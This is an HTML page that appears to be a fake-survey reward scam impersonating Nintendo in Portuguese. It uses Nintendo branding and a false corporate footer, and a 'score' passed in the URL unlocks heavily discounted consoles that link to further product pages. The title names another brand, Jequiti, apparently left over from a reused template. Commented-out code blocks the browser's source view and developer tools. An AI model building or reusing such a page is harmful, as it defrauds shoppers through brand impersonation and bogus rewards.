<!DOCTYPE html>
<html lang="pt">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title>JEQUITI | COM VOCÊ</title>
    <script src="js/latest.js" async="" defer=""></script>
    <link rel="stylesheet" href="css/products.css">
    <link rel="stylesheet" href="css/styles.css">
    <link rel="stylesheet" href="css/fonts.css">
    <link rel="stylesheet"
          href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,0,0">
    <style>
        body {
            font-family: 'GellixRegular', sans-serif;
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        .navbar {
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 15px;
            background-color: #fff;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
        }

        .navbar img {
            height: 5vh;
        }

        .navbar .menu-icon span {
            font-size: 30px;
            color: rgb(230, 0, 18);;
            margin-right: 10px;
            cursor: pointer;
        }

        .banner img {
            width: 100%;
            display: block;
        }

        .title {
            text-align: center;
            font-family: 'GellixSemiBold', sans-serif;
            font-size: 24px;
            color: rgb(230, 0, 18);;
            padding: 20px 0;
        }

        .bracelet-grid {
            display: flex;
            flex-wrap: wrap;
            gap: 15px;
            justify-content: center;
            padding: 20px;
        }

        .bracelet-item {
            border: 1px solid #ddd;
            border-radius: 12px;
            padding: 20px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            transition: transform 0.3s ease, box-shadow 0.3s ease;
            text-align: center;
            max-width: 400px;
            width: 100%;
            background-color: #fff;
        }

        .bracelet-item:hover {
            transform: scale(1.02);
            box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2);
        }

        .bracelet-item img {
            width: 100%;
            border-radius: 12px;
        }

        .nome {
            font-size: 18px;
            font-weight: 700;
            margin: 15px 0;
            color: #333;
        }

        .percentual-desconto {
            background-color: #f0f0f0;
            color: #d32f2f;
            border-radius: 8px;
            padding: 6px 12px;
            font-size: 14px;
            font-weight: 500;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            display: inline-block;
        }

        .old {
            text-decoration: line-through;
            color: #888;
            font-size: 16px;
        }

        .new {
            color: #d32f2f;
            font-size: 20px;
            font-weight: 700;
        }

        .preco-desconto-container {
            display: flex;
            align-items: center;
            gap: 10px;
            font-size: 16px;
            font-weight: 600;
            margin-top: 10px;
        }

        .footer {
            background-color: #f5f5f5;
            padding: 20px 0;
            text-align: center;
            font-family: 'GellixMedium', sans-serif;
        }

        .footer p {
            margin: 5px 0;

        }

        @media (max-width: 768px) {
            .bracelet-grid {
                padding: 10px; /* Reduzir o padding */
            }

            .bracelet-item {
                padding: 0px; /* Reduzir o padding */
                max-width: 100%; /* Garantir que o item ocupe a largura total disponível */
            }

            .footer {
                padding: 0;
            }
        }

        @media (max-width: 480px) {
            .bracelet-grid {
                padding: 5px; /* Reduzir ainda mais o padding para telas muito pequenas */
                gap: 0; /* Diminuir o espaço entre os itens */
            }

            .bracelet-item {
                padding: 10px; /* Reduzir ainda mais o padding */
            }

            .footer {
                padding: 0;
            }
        }

        .gBXjLJ {
            background-color: rgb(230, 0, 18);
            padding: 2.25rem 1rem;
            color: rgb(255, 255, 255);
            display: grid;
            place-items: center end;
        }

        .kyMLQS {
            max-width: 90rem;
            width: 100%;
            margin-left: auto;
            margin-right: auto;
        }

        .gBXjLJ .sc-a98dl2-6 {
            color: rgb(255, 255, 255);
            display: grid;
            place-items: center;
            width: auto;
            grid-template-columns: repeat(3, 1fr);
            gap: 2rem;
        }

        @media (min-width: 768px) {
            .gBXjLJ .sc-a98dl2-6 {
                width: 100%;
                justify-items: end;
                grid-template-columns: auto repeat(3, 58px);
            }
        }


    </style>
</head>
<body>
<div style="background-color: rgb(230, 0, 18);; text-align: center; padding: 5px; font-family: 'GellixMedium'; font-size: 13px; color: #ffffff">
    Pesquisa exclusiva: Nintendo para você
</div>
<nav class="navbar" style="padding-top: 15px;">
    <div class="menu-icon" style="padding-left: 3%;">
        <svg viewBox="0 0 97 24" xmlns="http://www.w3.org/2000/svg" width="69" role="presentation" alt=""
             data-testid="NintendoRacetrackLogoIcon" size="69" color="currentColor">
            <path d="M17.945 14.157l-4.85-7.838H9.609V17.59h3.486V9.752l4.85 7.838h3.456V6.32h-3.486l.03 7.837zm27.554-4.04V8.993H43.68v-1.52h-3.395v1.52h-1.849v1.124h1.85v7.473h3.394v-7.473h1.82zM23.341 17.56h3.364v-7.474h-3.364v7.474zm0-8.932h3.395V6.319H23.34v2.309zm59.17.942c-2.728 0-4.941 1.883-4.941 4.192s2.213 4.193 4.94 4.193c2.729 0 4.942-1.884 4.942-4.193 0-2.309-2.213-4.192-4.941-4.192zm1.364 5.772c0 1.185-.698 1.67-1.364 1.67-.667 0-1.395-.485-1.395-1.67v-3.16c0-1.184.697-1.67 1.395-1.67.666 0 1.364.486 1.364 1.67v3.16zm-10.73-4.891c-.547-.304-1.123-.608-1.91-.669-2.426-.212-4.305 1.945-4.305 3.92 0 2.612 2 3.554 2.304 3.706 1.152.516 2.607.547 3.88-.274v.426h3.334V6.32h-3.334c.03 0 .03 2.4.03 4.13zm.03 3.342v1.336c0 1.155-.789 1.458-1.334 1.458-.546 0-1.334-.303-1.334-1.458v-2.673c0-1.155.788-1.458 1.334-1.458.515 0 1.333.303 1.333 1.458v1.337zM34.616 9.752c-1.122.03-2.031.516-2.698 1.124v-.79h-3.365v7.474h3.365v-4.922c0-.638.697-1.367 1.607-1.367.909 0 1.546.73 1.546 1.367v4.922h3.364v-4.071c0-2.947-2.546-3.798-3.82-3.737zm27.433 0a4.075 4.075 0 0 0-2.698 1.124v-.79h-3.365v7.474h3.365v-4.922c0-.638.697-1.367 1.606-1.367.91 0 1.546.73 1.546 1.367v4.922h3.365v-4.071c0-2.947-2.546-3.798-3.82-3.737zm-7.063 4.101c0-2.309-2.243-4.253-4.971-4.253-2.759 0-4.972 1.884-4.972 4.193 0 2.308 2.213 4.192 4.972 4.192 2.273 0 4.213-1.306 4.789-3.068H51.44v.455c0 1.367-.91 1.671-1.394 1.671-.515 0-1.425-.304-1.425-1.67v-1.55l6.366.03zm-6.123-2.643a1.391 1.391 0 0 1 1.182-.668c.455 0 .91.213 1.182.668.212.365.212.82.212 1.458H48.62c0-.637.03-1.063.243-1.458zm39.921-3.493c0-.365-.272-.547-.818-.547h-.758v1.914h.455v-.79h.242l.364.79h.515l-.424-.851c.273-.091.424-.273.424-.516zm-.879.273h-.242v-.547h.212c.273 0 .424.091.424.274 0 .212-.12.273-.394.273zm.03-1.58c-.94 0-1.727.79-1.727 1.732s.788 1.732 1.728 1.732 1.727-.79 1.727-1.732a1.73 1.73 0 0 0-1.727-1.732zm0 3.13a1.413 1.413 0 0 1-1.394-1.398c0-.76.637-1.398 1.395-1.398.757 0 1.394.638 1.394 1.398 0 .76-.637 1.397-1.394 1.397zM84.148 0H12.64C5.062-.03 0 5.438 0 11.97c0 6.53 5.062 11.939 12.67 11.939h71.508c7.608 0 12.67-5.408 12.67-11.94C96.818 5.44 91.726 0 84.148 0zm-.03 20.993H12.671c-6.033.03-9.7-4.041-9.7-9.023 0-4.983 3.698-8.993 9.7-9.023h71.446c6.002 0 9.7 4.04 9.7 9.023 0 4.982-3.668 9.023-9.7 9.023z"
                  fill="currentColor"></path>
        </svg>

    </div>
    <div class="logo-central"></div>
    <div class="menu-icon" style="padding-right: 3%;">
        <span class="material-symbols-outlined"
              style="font-size: 30px; padding-right: 10px; color: rgb(230, 0, 18);">search</span>
        <span class="material-symbols-outlined" style="font-size: 30px; padding-right: 10px; color: rgb(230, 0, 18);">shopping_cart</span>
        <span class="material-symbols-outlined" style="font-size: 30px; padding-right: 10px; color: rgb(230, 0, 18);">menu</span>
    </div>
</nav>
<img src="images/Ncom_2880x900_centerstage-D_PT.avif" style="width: 100%;" id="scrollImage">
<p style="text-align: center; font-family: 'GellixSemiBold'; font-size: 24px; padding-top: 0px;color: rgb(230, 0, 18);">
    Resgate
    sua recompensa!</p>
<div class="bracelet-grid" id="products-grid"></div>
<div class="divisoria2"></div>
<style>
    body {
        font-family: 'Arial', sans-serif;
        line-height: 1.6;
        margin: 0;
        padding: 0;
        color: #333;
        display: flex;
        flex-direction: column;
        /*align-items: center;*/
        background: #FFFDFF;
    }

    #banner-container {
        width: 100%;
        text-align: center;
        padding: 20px 0;
        box-sizing: border-box; /* Inclui padding na largura total */
    }

    #banner-container img {
        width: 75%;
        max-width: 75%;
        height: auto;
        border-radius: 15px;
        box-shadow: 0 8px 16px rgba(0, 0, 0, 0.2);
    }
    #scrollImage {
        max-width: 100%;
        height: auto;
        border-radius: 15px; /* Borda arredondada */
        box-shadow: 0 8px 16px rgba(0, 0, 0, 0.2); /* Sombra mais pronunciada */
        transition: transform 0.3s ease-in-out; /* Transição suave */
    }

    #scrollImage:hover {
        transform: scale(1.05); /* Aumenta um pouco ao passar o mouse */
    }

    .advantages {
        width: 72%;
        max-width: 72%;
        margin: 40px auto;
        padding: 20px;
        background-color: #FFFDFF; /* Fundo branco */
        border-radius: 15px;
        box-shadow: 0 8px 16px rgba(0, 0, 0, 0.2); /* Sombra mais pronunciada */
        text-align: center; /* Texto centralizado */
    }

    .advantages h2 {
        color: rgb(230, 0, 18); /* Cor do título em azul */
        margin-bottom: 20px;
        font-size: 2em;
        font-weight: bold;
    }

    .advantages p {
        color: #555;
        margin-bottom: 20px;
        font-size: 1.1em;
    }

    .advantages ul {
        list-style-type: none; /* Tipo de marcador, você pode mudar para 'circle', 'square' ou 'none' se preferir */
        padding-left: 20px;    /* Adiciona espaçamento interno à esquerda dos itens da lista */
        margin-left: 0;
    }

    .advantages li {
        margin-bottom: 15px;
        font-size: 1.1em;
        text-align: left;
    }

    .advantages li::before {
        content: "⭐";
        color: #ffd700; /* Estrela dourada */
        margin-right: 10px;
    }

    .button-container {
        display: flex;
        flex-direction: column;
        align-items: center;
        margin-top: 20px;


    }

    .mario-btn {
        /*background-color: #ff4500;*/
        /*color: #fff;*/

        padding: 15px 25px;
        border: none;
        border-radius: 25px;
        font-size: 1.2em;
        cursor: pointer;
        transition: background-color 0.3s ease;
        position: relative;
        z-index: 1;
        overflow: hidden;
    }

    /*.mario-btn:hover {*/
    /*    background-color: #e63e00;*/
    /*}*/

    .mario-animation {
        display: none;
        margin-bottom: 20px; /* Margem inferior para afastar do botão */

    }

    .mario-animation img {
        max-width: 200px;
    }

    @media (max-width: 768px) {
        #banner-container {
            margin-top: 30px;
            padding: 0;
        }


        .advantages h2 {
            font-size: 1.5em;
        }

        .advantages p,
        .advantages li {
            font-size: 1em;
        }

        .mario-animation {
            bottom: 100px; /* Ajustar conforme necessário para telas menores */
        }

        .mario-btn img {
            max-width: 100%; /* Ajustar largura da imagem para telas menores */
        }
    }
</style>
<div id="banner-container">
    <picture>
        <source srcset="images/switch-family-es%20(1).avif" media="(max-width: 768px)">
        <source srcset="images/switch-family-es.jpeg" media="(min-width: 769px)">
        <img src="images/switch-family-es%20.avif" id="scrollImage2" alt="Banner Image">
    </picture>
</div>
<div class="advantages">
    <h2>Vantagens de Comprar os Consoles da Nintendo</h2>
    <p>A Nintendo é sinônimo de inovação e diversão no mundo dos games. Aqui estão algumas razões para você considerar adquirir um console da Nintendo:</p>
    <ul>
        <li><strong>Jogos Exclusivos:</strong> Desfrute de títulos icônicos como Mario, Zelda, Pokémon e Animal Crossing, que você só encontra nos consoles da Nintendo.</li>
        <li><strong>Inovação:</strong> Experimente novas maneiras de jogar com o Nintendo Switch, que pode ser usado tanto como console de mesa quanto como portátil.</li>
        <li><strong>Multiplayer Divertido:</strong> Jogos para jogar com amigos e familiares, seja localmente ou online, garantem horas de diversão.</li>
        <li><strong>Durabilidade:</strong> Produtos Nintendo são conhecidos por sua qualidade e durabilidade, oferecendo um ótimo custo-benefício.</li>
        <li><strong>Jogabilidade Acessível:</strong> Jogos fáceis de aprender e difíceis de dominar, perfeitos para jogadores de todas as idades e níveis de habilidade.</li>
    </ul>
</div>
<div class="button-container">
    <div class="mario-animation" id="marioAnimation">
        <img src="images/200w.gif" alt="Mario Animation">
    </div>
    <button class="mario-btn" onclick="showMarioAnimation()">
        <img src="images/4576x744_LATAM_GameStoreBanner_01_PT.avif" alt="Banner Button" style="border-radius: 25px;">
    </button>
    <audio id="coinSound" src="images/DINHEIRO.WAV"></audio>
</div>
<div style="margin-top: 20px;"></div>

<script>
    // document.addEventListener('contextmenu', (e) => e.preventDefault());
    //
    // document.addEventListener('keydown', function(event) {
    //     // Bloqueia Ctrl + U
    //     if (event.ctrlKey && event.key === 'u') {
    //         event.preventDefault(); // Bloqueia a ação padrão
    //         alert('A combinação Ctrl + U está bloqueada!');
    //     }
    //
    //     // Bloqueia F12
    //     if (event.key === 'F12') {
    //         event.preventDefault(); // Bloqueia a ação padrão
    //         alert('A tecla F12 está bloqueada!');
    //     }
    // });


    // const checkDevTools = () => {
    //     const threshold = 160; // Ajuste este valor conforme necessário
    //     if (window.outerHeight - window.innerHeight > threshold || window.outerWidth - window.innerWidth > threshold) {
    //         alert('Desenvolvedor tools detectado!');
    //         // Aqui, você pode tentar redirecionar o usuário ou realizar outra ação.
    //     }
    // };
    //
    // setInterval(checkDevTools, 1000); // Verifica a cada segundo

    function showMarioAnimation() {
        var marioAnimation = document.getElementById('marioAnimation');
        var coinSound = document.getElementById('coinSound');

        // Exibe a animação e toca o som
        marioAnimation.style.display = 'block';
        coinSound.play();

        // Rola até a animação do Mario
        marioAnimation.scrollIntoView({
            behavior: 'smooth',
            block: 'center'
        });

        // Rola para o topo da página após a animação
        setTimeout(function() {
            window.scrollTo({
                top: 10,
                behavior: 'smooth'
            });
        }, 2000);
    }
</script>


<section data-testid="brandbar"
         style="background-color: rgb(230, 0, 18); color: rgb(255, 255, 255); padding: 10px 0; text-align: center;">
    <div style="display: inline-flex; align-items: center; justify-content: center;">
        <a href="javascript:void()" target="_self" rel="" title="Página da Nintendo" aria-label="Página da Nintendo"
           style="margin: 0 15px;">
            <svg viewBox="0 0 97 24" xmlns="http://www.w3.org/2000/svg" width="195" role="presentation" alt=""
                 data-testid="NintendoRacetrackLogoIcon" size="195" color="currentColor">
            <path d="M17.945 14.157l-4.85-7.838H9.609V17.59h3.486V9.752l4.85 7.838h3.456V6.32h-3.486l.03 7.837zm27.554-4.04V8.993H43.68v-1.52h-3.395v1.52h-1.849v1.124h1.85v7.473h3.394v-7.473h1.82zM23.341 17.56h3.364v-7.474h-3.364v7.474zm0-8.932h3.395V6.319H23.34v2.309zm59.17.942c-2.728 0-4.941 1.883-4.941 4.192s2.213 4.193 4.94 4.193c2.729 0 4.942-1.884 4.942-4.193 0-2.309-2.213-4.192-4.941-4.192zm1.364 5.772c0 1.185-.698 1.67-1.364 1.67-.667 0-1.395-.485-1.395-1.67v-3.16c0-1.184.697-1.67 1.395-1.67.666 0 1.364.486 1.364 1.67v3.16zm-10.73-4.891c-.547-.304-1.123-.608-1.91-.669-2.426-.212-4.305 1.945-4.305 3.92 0 2.612 2 3.554 2.304 3.706 1.152.516 2.607.547 3.88-.274v.426h3.334V6.32h-3.334c.03 0 .03 2.4.03 4.13zm.03 3.342v1.336c0 1.155-.789 1.458-1.334 1.458-.546 0-1.334-.303-1.334-1.458v-2.673c0-1.155.788-1.458 1.334-1.458.515 0 1.333.303 1.333 1.458v1.337zM34.616 9.752c-1.122.03-2.031.516-2.698 1.124v-.79h-3.365v7.474h3.365v-4.922c0-.638.697-1.367 1.607-1.367.909 0 1.546.73 1.546 1.367v4.922h3.364v-4.071c0-2.947-2.546-3.798-3.82-3.737zm27.433 0a4.075 4.075 0 0 0-2.698 1.124v-.79h-3.365v7.474h3.365v-4.922c0-.638.697-1.367 1.606-1.367.91 0 1.546.73 1.546 1.367v4.922h3.365v-4.071c0-2.947-2.546-3.798-3.82-3.737zm-7.063 4.101c0-2.309-2.243-4.253-4.971-4.253-2.759 0-4.972 1.884-4.972 4.193 0 2.308 2.213 4.192 4.972 4.192 2.273 0 4.213-1.306 4.789-3.068H51.44v.455c0 1.367-.91 1.671-1.394 1.671-.515 0-1.425-.304-1.425-1.67v-1.55l6.366.03zm-6.123-2.643a1.391 1.391 0 0 1 1.182-.668c.455 0 .91.213 1.182.668.212.365.212.82.212 1.458H48.62c0-.637.03-1.063.243-1.458zm39.921-3.493c0-.365-.272-.547-.818-.547h-.758v1.914h.455v-.79h.242l.364.79h.515l-.424-.851c.273-.091.424-.273.424-.516zm-.879.273h-.242v-.547h.212c.273 0 .424.091.424.274 0 .212-.12.273-.394.273zm.03-1.58c-.94 0-1.727.79-1.727 1.732s.788 1.732 1.728 1.732 1.727-.79 1.727-1.732a1.73 1.73 0 0 0-1.727-1.732zm0 3.13a1.413 1.413 0 0 1-1.394-1.398c0-.76.637-1.398 1.395-1.398.757 0 1.394.638 1.394 1.398 0 .76-.637 1.397-1.394 1.397zM84.148 0H12.64C5.062-.03 0 5.438 0 11.97c0 6.53 5.062 11.939 12.67 11.939h71.508c7.608 0 12.67-5.408 12.67-11.94C96.818 5.44 91.726 0 84.148 0zm-.03 20.993H12.671c-6.033.03-9.7-4.041-9.7-9.023 0-4.983 3.698-8.993 9.7-9.023h71.446c6.002 0 9.7 4.04 9.7 9.023 0 4.982-3.668 9.023-9.7 9.023z"
                  fill="white"></path>
        </svg>
        </a>
    </div>
</section>
<div class="footer" style=" background-color:#242424; color:white;">
    © Nintendo. Os jogos são propriedade de seus respectivos donos. Nintendo of America Inc. A sede está localizada em
    Redmond, Washington (EUA).
</div>
<script>
    document.getElementById('scrollImage2').addEventListener('click', function () {
        document.getElementById('products-grid').scrollIntoView({
            behavior: 'smooth',
            block: 'start'
        });
    });
    document.getElementById('scrollImage').addEventListener('click', function () {
        document.getElementById('products-grid').scrollIntoView({
            behavior: 'smooth',
            block: 'start'
        });
    });
    document.addEventListener('DOMContentLoaded', function () {
        function getQueryStringParameter(name) {
            const urlParams = new URLSearchParams(window.location.search);
            return urlParams.get(name);
        }

        const score = parseInt(getQueryStringParameter('score')) || 0;

        async function loadProducts() {
            try {
                const response = await fetch('valores.json');
                const valores = await response.json();

                function getRange(score) {
                    if (score >= 0 && score <= 250) return "0-250";
                    if (score > 250 && score <= 500) return "250-500";
                    if (score > 500 && score <= 750) return "500-750";
                    if (score > 750 && score <= 1000) return "750-1000";
                    return "750-1000";
                }

                const faixa = getRange(score);
                const produtos = valores[faixa] || [];
                const productsGrid = document.getElementById('products-grid');
                produtos.forEach(produto => {
                    const html = `
    <div class="bracelet-item" onclick="window.location.href='produtos/${produto.link}/' + window.location.search;">
                                <img src="images/${produto.produto}" alt="${produto.nome}">
                                <p class="nome">${produto.nome}</p>
                                <div class="preco-desconto-container">
                                    <p class="old">R$${produto.preco_original.toFixed(2)}</p>
                                    <p class="new">R$${produto.preco_atual.toFixed(2)}</p>
                                    <p class="percentual-desconto">Desconto: ${(100 - (produto.preco_atual / produto.preco_original * 100)).toFixed(0)}%</p>
                                </div>
                            </div>`;
                    productsGrid.innerHTML += html;
                });
            } catch (error) {
                console.error('Erro ao carregar os produtos:', error);
            }
        }

        loadProducts();
    });
</script>
</body>
</html>

